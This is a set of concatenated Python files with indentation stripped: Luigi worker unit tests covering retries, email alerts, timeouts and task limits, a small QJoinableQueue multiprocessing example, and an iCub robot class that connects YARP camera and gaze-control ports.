def test_dynamic_dependencies_other_module(self):
t = DynamicRequiresOtherModule(p=self.p)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
class DynamicDependenciesWithMultipleWorkersTest(DynamicDependenciesTest):
n_workers = 100
timeout = 3.0 # We run 7 tasks that take 0.5s each so it should take less than 3.5s
class WorkerPingThreadTests(unittest.TestCase):
def test_ping_retry(self):
""" Worker ping fails once. Ping continues to try to connect to scheduler
Kind of ugly since it uses actual timing with sleep to test the thread
"""
sch = Scheduler(
retry_delay=100,
remove_delay=1000,
worker_disconnect_delay=10,
)
self._total_pings = 0 # class var so it can be accessed from fail_ping
def fail_ping(worker):
# this will be called from within keep-alive thread...
self._total_pings += 1
raise Exception("Some random exception")
sch.ping = fail_ping
with Worker(
scheduler=sch,
worker_id="foo",
ping_interval=0.01 # very short between pings to make test fast
):
# let the keep-alive thread run for a bit...
time.sleep(0.1) # yes, this is ugly but it's exactly what we need to test
self.assertTrue(
self._total_pings > 1,
msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
)
def test_ping_thread_shutdown(self):
with Worker(ping_interval=0.01) as w:
self.assertTrue(w._keep_alive_thread.is_alive())
self.assertFalse(w._keep_alive_thread.is_alive())
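# email_patch: decorator that forces error-email config and patches smtplib.SMTP
# so the wrapped test receives a list of the messages "sent" during the test.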
def email_patch(test_func, email_config=None):
EMAIL_CONFIG = {"core": {"error-email": "not-a-real-email-address-for-test-only"}, "email": {"force-send": "true"}}
if email_config is not None:
EMAIL_CONFIG.update(email_config)
emails = []
def mock_send_email(sender, recipients, msg):
emails.append(msg)
@with_config(EMAIL_CONFIG)
@functools.wraps(test_func)
@mock.patch('smtplib.SMTP')
def run_test(self, smtp):
smtp().sendmail.side_effect = mock_send_email
test_func(self, emails)
return run_test
def custom_email_patch(config):
return functools.partial(email_patch, email_config=config)
class WorkerEmailTest(LuigiTestCase):
def run(self, result=None):
super(WorkerEmailTest, self).setUp()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as self.worker:
super(WorkerEmailTest, self).run(result)
@email_patch
def test_connection_error(self, emails):
sch = RemoteScheduler('http://tld.invalid:1337', connect_timeout=1)
self.waits = 0
def dummy_wait():
self.waits += 1
sch._wait = dummy_wait
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
with Worker(scheduler=sch) as worker:
try:
worker.add(a)
except RPCError:
self.assertEqual(self.waits, 2) # should attempt to add it 3 times
self.assertNotEqual(emails, [])
self.assertTrue(emails[0].find("Luigi: Framework error while scheduling %s" % (a,)) != -1)
else:
self.fail()
@email_patch
def test_complete_error(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@email_patch
def test_requires_error(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertFalse(a.has_run)
@email_patch
def test_complete_return_value(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@email_patch
def test_run_error(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
a = A()
self.worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
@email_patch
def test_task_process_dies(self, emails):
a = SendSignalTask(signal.SIGKILL)
luigi.build([a], workers=2, local_scheduler=True)
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("died unexpectedly with exit code -9") != -1)
@email_patch
def test_task_times_out(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("timed out after 0.0001 seconds and was terminated.") != -1)
@with_config(dict(worker=dict(retry_external_tasks='true')))
@email_patch
def test_external_task_retries(self, emails):
"""
Test that we do not send error emails on the failures of external tasks
"""
class A(luigi.ExternalTask):
pass
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(emails, [])
@email_patch
def test_no_error(self, emails):
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertTrue(a.complete())
@custom_email_patch({"core": {"error-email": "not-a-real-email-address-for-test-only", 'email-type': 'none'}})
def test_disable_emails(self, emails):
class A(luigi.Task):
def complete(self):
raise Exception("b0rk")
self.worker.add(A())
self.assertEqual(emails, [])
class RaiseSystemExit(luigi.Task):
def run(self):
raise SystemExit("System exit!!")
class SendSignalTask(luigi.Task):
signal = luigi.IntParameter()
def run(self):
os.kill(os.getpid(), self.signal)
class HangTheWorkerTask(luigi.Task):
worker_timeout = luigi.IntParameter(default=None)
def run(self):
while True:
pass
def complete(self):
return False
class MultipleWorkersTest(unittest.TestCase):
@unittest.skip('Always skip. There are many intermittent failures')
# This passes under python3 when run as `nosetests test/worker_test.py`
# but not as `nosetests test`. Probably some side effect of previous tests
@unittest.skipIf(six.PY3, 'This test fail on python3 when run with tox.')
def test_multiple_workers(self):
# Test using multiple workers
# Also test generating classes dynamically since this may reflect issues with
# various platforms and how multiprocessing is implemented. If it's using os.fork
# under the hood it should be fine, but dynamic classes can't be pickled, so
# other implementations of multiprocessing (using spawn etc) may fail
class MyDynamicTask(luigi.Task):
x = luigi.Parameter()
def run(self):
time.sleep(0.1)
t0 = time.time()
luigi.build([MyDynamicTask(i) for i in range(100)], workers=100, local_scheduler=True)
self.assertTrue(time.time() < t0 + 5.0) # should ideally take exactly 0.1s, but definitely less than 5.0
def test_zero_workers(self):
d = DummyTask()
luigi.build([d], workers=0, local_scheduler=True)
self.assertFalse(d.complete())
def test_system_exit(self):
# This would hang indefinitely before this fix:
# https://github.com/spotify/luigi/pull/439
luigi.build([RaiseSystemExit()], workers=2, local_scheduler=True)
def test_term_worker(self):
luigi.build([SendSignalTask(signal.SIGTERM)], workers=2, local_scheduler=True)
def test_kill_worker(self):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
def test_purge_multiple_workers(self):
w = Worker(worker_processes=2, wait_interval=0.01)
t1 = SendSignalTask(signal.SIGTERM)
t2 = SendSignalTask(signal.SIGKILL)
w.add(t1)
w.add(t2)
w._run_task(t1.task_id)
w._run_task(t2.task_id)
time.sleep(1.0)
w._handle_next_task()
w._handle_next_task()
w._handle_next_task()
def test_stop_worker_kills_subprocesses(self):
with Worker(worker_processes=2) as w:
hung_task = HangTheWorkerTask()
w.add(hung_task)
w._run_task(hung_task.task_id)
pids = [p.pid for p in w._running_tasks.values()]
self.assertEqual(1, len(pids))
pid = pids[0]
def is_running():
return pid in {p.pid for p in psutil.Process().children()}
self.assertTrue(is_running())
self.assertFalse(is_running())
def test_time_out_hung_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=2, local_scheduler=True)
def test_time_out_hung_single_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=1, local_scheduler=True)
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/72953986')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_default_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask()
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 5
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 6
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/76645264')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_override_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=10)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 10
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 11
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
class Dummy2Task(Task):
p = luigi.Parameter()
def output(self):
return MockTarget(self.p)
def run(self):
f = self.output().open('w')
f.write('test')
f.close()
class AssistantTest(unittest.TestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.assistant = Worker(scheduler=self.sch, worker_id='Y', assistant=True)
with Worker(scheduler=self.sch, worker_id='X') as w:
self.w = w
super(AssistantTest, self).run(result)
def test_get_work(self):
d = Dummy2Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assistant.run()
self.assertTrue(d.complete())
def test_bad_job_type(self):
class Dummy3Task(Dummy2Task):
task_family = 'UnknownTaskFamily'
d = Dummy3Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assertFalse(self.assistant.run())
self.assertFalse(d.complete())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [d.task_id])
def test_unimported_job_type(self):
MODULE_CONTENTS = b'''
import luigi
class UnimportedTask(luigi.Task):
def complete(self):
return False
'''
class NotImportedTask(luigi.Task):
task_family = 'UnimportedTask'
task_module = None
task = NotImportedTask()
# verify that it can't run the task without the module info necessary to import it
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
# check that it can import with the right module
with temporary_unloaded_module(MODULE_CONTENTS) as task.task_module:
self.w.add(task)
self.assertTrue(self.assistant.run())
self.assertEqual(list(self.sch.task_list('DONE', '').keys()), [task.task_id])
def test_unimported_job_sends_failure_message(self):
class NotInAssistantTask(luigi.Task):
task_family = 'Unknown'
task_module = None
task = NotInAssistantTask()
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
self.assertTrue(self.sch.fetch_error(task.task_id)['error'])
class ForkBombTask(luigi.Task):
depth = luigi.IntParameter()
breadth = luigi.IntParameter()
p = luigi.Parameter(default=(0, ))  # a list default like [0] ends up as a tuple, so use a tuple explicitly
def output(self):
return MockTarget('.'.join(map(str, self.p)))
def run(self):
with self.output().open('w') as f:
f.write('Done!')
def requires(self):
if len(self.p) < self.depth:
for i in range(self.breadth):
yield ForkBombTask(self.depth, self.breadth, self.p + (i, ))
class TaskLimitTest(unittest.TestCase):
def tearDown(self):
MockFileSystem().remove('')
@with_config({'core': {'worker-task-limit': '6'}})
def test_task_limit_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertFalse(t.complete())
leaf_tasks = [ForkBombTask(3, 2, branch) for branch in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1)]]
self.assertEqual(3, sum(t.complete() for t in leaf_tasks),
"should have gracefully completed as much as possible even though the single last leaf didn't get scheduled")
@with_config({'core': {'worker-task-limit': '7'}})
def test_task_limit_not_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
def test_no_task_limit(self):
w = Worker()
t = ForkBombTask(4, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
class WorkerConfigurationTest(unittest.TestCase):
def test_asserts_for_worker(self):
"""
Test that Worker() asserts that it's sanely configured
"""
Worker(wait_interval=1) # This shouldn't raise
self.assertRaises(AssertionError, Worker, wait_interval=0)
class WorkerWaitJitterTest(unittest.TestCase):
@with_config({'worker': {'wait_jitter': '10.0'}})
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter(self, mock_sleep, mock_random):
""" verify configured jitter amount """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 2.0
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(3.0)
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter_default(self, mock_sleep, mock_random):
""" verify default jitter is as expected """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 3.3
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(4.3)
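# Aside (not part of the original test suite): a hypothetical restatement of the
# sleep calculation that WorkerWaitJitterTest pins down above -- the worker
# appears to sleep for wait_interval plus a uniform jitter, with wait_interval
# defaulting to 1.0 and wait_jitter to 5.0 as the assertions suggest.
def _expected_sleep_sketch(wait_interval=1.0, wait_jitter=5.0):
    import random
    return wait_interval + random.uniform(0, wait_jitter)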
class KeyboardInterruptBehaviorTest(LuigiTestCase):
def test_propagation_when_executing(self):
"""
Ensure that a keyboard interrupt causes luigi to quit when you are
executing tasks.
TODO: Add a test that tests the multiprocessing (--worker >1) case
"""
class KeyboardInterruptTask(luigi.Task):
def run(self):
raise KeyboardInterrupt()
cmd = 'KeyboardInterruptTask --local-scheduler --no-lock'.split(' ')
self.assertRaises(KeyboardInterrupt, luigi_run, cmd)
def test_propagation_when_scheduling(self):
"""
Test that KeyboardInterrupt causes luigi to quit while scheduling.
"""
class KeyboardInterruptTask(luigi.Task):
def complete(self):
raise KeyboardInterrupt()
class ExternalKeyboardInterruptTask(luigi.ExternalTask):
def complete(self):
raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, luigi_run,
['KeyboardInterruptTask', '--local-scheduler', '--no-lock'])
self.assertRaises(KeyboardInterrupt, luigi_run,
['ExternalKeyboardInterruptTask', '--local-scheduler', '--no-lock'])
class WorkerPurgeEventHandlerTest(unittest.TestCase):
@mock.patch('luigi.worker.TaskProcess')
def test_process_killed_handler(self, task_proc):
result = []
@HangTheWorkerTask.event_handler(Event.PROCESS_FAILURE)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker()
task = HangTheWorkerTask()
task_process = mock.MagicMock(is_alive=lambda: False, exitcode=-14, task=task)
task_proc.return_value = task_process
w.add(task)
w._run_task(task.task_id)
w._handle_next_task()
self.assertEqual(result, [task])
@mock.patch('luigi.worker.time')
def test_timeout_handler(self, mock_time):
result = []
@HangTheWorkerTask.event_handler(Event.TIMEOUT)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=1)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 3
w._handle_next_task()
self.assertEqual(result, [task])
class PerTaskRetryPolicyBehaviorTest(LuigiTestCase):
def setUp(self):
super(PerTaskRetryPolicyBehaviorTest, self).setUp()
self.per_task_retry_count = 2
self.default_retry_count = 1
self.sch = Scheduler(retry_delay=0.1, retry_count=self.default_retry_count, prune_on_get_work=True)
def test_with_all_disabled_with_single_worker(self):
"""
This test covers a task (TestWrapperTask) that requires two other tasks (TestErrorTask1, TestErrorTask2),
both of which fail.
TestErrorTask1 uses the default retry_count of 1, while TestErrorTask2 sets retry_count to 2 at task level.
This test runs on a single worker.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_all_disabled_with_multiple_worker(self):
"""
This test covers a task (TestWrapperTask) that requires two other tasks (TestErrorTask1, TestErrorTask2),
both of which fail.
TestErrorTask1 uses the default retry_count of 1, while TestErrorTask2 sets retry_count to 2 at task level.
This test runs with multiple workers.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e2))
self.assertTrue(w3.add(e1))
self.assertFalse(w3.run())
self.assertFalse(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_includes_success_with_single_worker(self):
"""
This test covers a task (TestWrapperTask) that requires one task that FAILS (TestErrorTask1) and one that SUCCEEDS (TestSuccessTask1).
TestSuccessTask1 finishes as DONE, while TestErrorTask1 fails and sets retry_count to 2 at task level.
This test runs on a single worker.
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_includes_success_with_multiple_worker(self):
"""
This test covers a task (TestWrapperTask) that requires one task that FAILS (TestErrorTask1) and one that SUCCEEDS (TestSuccessTask1).
TestSuccessTask1 finishes as DONE, while TestErrorTask1 fails and sets retry_count to 2 at task level.
This test runs with multiple workers.
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e1))
self.assertTrue(w3.add(s1))
self.assertTrue(w3.run())
self.assertFalse(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_single_worker(self):
"""
This test covers dynamic dependency tasks (TestErrorTask1, TestErrorTask2), both of which fail.
TestErrorTask1 uses the default retry_count of 1, while TestErrorTask2 sets retry_count to 2 at task level.
This test runs on a single worker.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_multiple_workers(self):
"""
This test covers dynamic dependency tasks (TestErrorTask1, TestErrorTask2), both of which fail.
TestErrorTask1 uses the default retry_count of 1, while TestErrorTask2 sets retry_count to 2 at task level.
This test runs with multiple workers.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1) as w2:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(s1))
self.assertTrue(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
|
test_joinablequeue_simple_inverted.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# @author: Ramón Invarato Menéndez
# @version 1.0
import multiprocessing
from quick_queue.quick_queue import QJoinableQueue
"""
Execute this script to see the result in the console.
A subprocess puts some values into a QJoinableQueue; the main process gets them and acknowledges each one with task_done().
"""
def _process(qjq):
qjq.put("A")
qjq.put("B")
qjq.put("C")
print('All work completed')
qjq.join()
print('SubProcess completed')
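# Aside (not part of the original example): QJoinableQueue mirrors the standard
# library's multiprocessing.JoinableQueue protocol -- join() blocks until every
# put() item has been acknowledged with task_done(). A minimal stdlib sketch of
# the same handshake, for comparison (defined here but not called):
def _stdlib_joinablequeue_sketch():
    jq = multiprocessing.JoinableQueue()
    for value in ("A", "B", "C"):
        jq.put(value)
    for _ in range(3):
        print(jq.get())
        jq.task_done()  # acknowledge each item so join() can return
    jq.join()  # returns immediately once all items are acknowledged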
if __name__ == "__main__":
qjq = QJoinableQueue()
p = multiprocessing.Process(target=_process, args=(qjq,))
p.start()
print(qjq.get())
qjq.task_done()
print(qjq.get())
qjq.task_done()
print(qjq.get())
qjq.task_done()
print('MainProcess completed')
|
icub.py
|
#!/usr/bin/python
# The MIT License (MIT)
#
# Copyright (c) 2017 Massimiliano Patacchiola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Commands to launch in simulation mode
# yarpserver
# ./iCub_SIM
# ./iKinGazeCtrl --from configSim.ini
# yarpdev --device opencv_grabber
# yarp connect /grabber /icubSim/texture/screen
#
# For the cartesian controller of the left arm
# ./simCartesianControl
# ./iKinCartesianSolver --context simCartesianControl --part left_arm
import numpy as np
import cv2
import time
import yarp
import acapela
import subprocess
import csv
from deepgaze.color_classification import HistogramColorClassifier
from deepgaze.color_detection import BackProjectionColorDetector
from deepgaze.motion_detection import MogMotionDetector
from deepgaze.mask_analysis import BinaryMaskAnalyser
import threading
import random
class iCub:
def __init__(self, icub_root='/icubSim'):
# Global variables
self.thread_movement_detection = threading.Thread(target=None)
self.acapela_account_login = ''
self.acapela_application_login = ''
self.acapela_application_password = ''
self.acapela_service_url = ''
# Deepgaze variables
self.object_list = list()
self.histogram_classifier = HistogramColorClassifier(channels=[0, 1, 2], hist_size=[128, 128, 128],
hist_range=[0, 256, 0, 256, 0, 256], hist_type='BGR')
# Init YARP
yarp.Network.init()
# Camera connection
try:
cam_w = 320 # 640
cam_h = 240 # 480
# Left camera
print("[ICUB] Init: Waiting for " + icub_root + "/cam/left' ...")
self.port_left_camera = yarp.Port()
self.port_left_camera.open("/pyera-left-image-port")
yarp.Network.connect(icub_root+"/cam/left", "/pyera-left-image-port")
# right camera
print("[ICUB] Init: Waiting for " + icub_root + "/cam/right' ...")
self.port_right_camera = yarp.Port()
self.port_right_camera.open("/pyera-right-image-port")
yarp.Network.connect(icub_root+"/cam/right", "/pyera-right-image-port")
# Set the numpy array to fill with the image
self.img_array = np.zeros((cam_h, cam_w, 3), dtype=np.uint8)
self.yarp_image = yarp.ImageRgb()
self.yarp_image.resize(cam_w, cam_h)
self.yarp_image.setExternal(self.img_array, self.img_array.shape[1], self.img_array.shape[0])
except BaseException, err:
print("[ICUB][ERROR] connect To Camera catching error " + str(err))
return
try:
if icub_root.find("Sim") > -1:
print("[ICUB] Simulation Mode, connecting grabber to texture/screen ")
# yarp connect /grabber /icubSim/texture/screen
yarp.Network.connect("/grabber", icub_root + "/texture/screen")
except BaseException, err:
print("[ICUB][ERROR] connecting /grabber to /texture/screen catching error " + str(err))
return
try:
self.port_ikin_mono = yarp.Port()
self.port_ikin_mono.open("/pyera-ikin-mono")
yarp.Network.connect("/pyera-ikin-mono", "/iKinGazeCtrl/mono:i")
except BaseException, err:
print("[ICUB][ERROR] connect To iKinGazeCtrl/mono catching error " + str(err))
return
try:
self.port_ikin_stereo = yarp.Port()
self.port_ikin_stereo.open("/pyera-ikin-stereo")
yarp.Network.connect("/pyera-ikin-stereo", "/iKinGazeCtrl/stereo:i")
except BaseException, err:
print("[ICUB][ERROR] connect To iKinGazeCtrl/stereo catching error " + str(err))
return
try:
self.port_ikin_xd = yarp.Port()
self.port_ikin_xd.open("/pyera-ikin-xd")
yarp.Network.connect("/pyera-ikin-xd", "/iKinGazeCtrl/xd:i")
except BaseException, err:
print("[ICUB][ERROR] connect To iKinGazeCtrl/xd catching error " + str(err))
return
try:
self.port_cart_leftarm = yarp.Port()
self.port_cart_leftarm.open("/pyera-cart-leftarm")
yarp.Network.connect("/pyera-cart-leftarm", "/cartesianSolver/left_arm/in")
except BaseException, err:
print("[ICUB][ERROR] connect To /cartesianSolver/left_arm/in catching error " + str(err))
return
self.rpc_client_head = yarp.RpcClient()
self.rpc_client_head.addOutput(icub_root+"/head/rpc:i")
self.rpc_client_head_ikin = yarp.RpcClient()
self.rpc_client_head_ikin.addOutput("/iKinGazeCtrl/rpc")
def close(self):
"""Close all the services
"""
self.port_left_camera.close()
self.port_right_camera.close()
self.rpc_client_head.close()
def check_connection(self):
"""Check if the internet connection is present or not
@return: True if connected, otherwise False
"""
import socket
try:
host = socket.gethostbyname("www.google.com")
socket.create_connection((host, 80), 2)
return True
except:
pass
return False
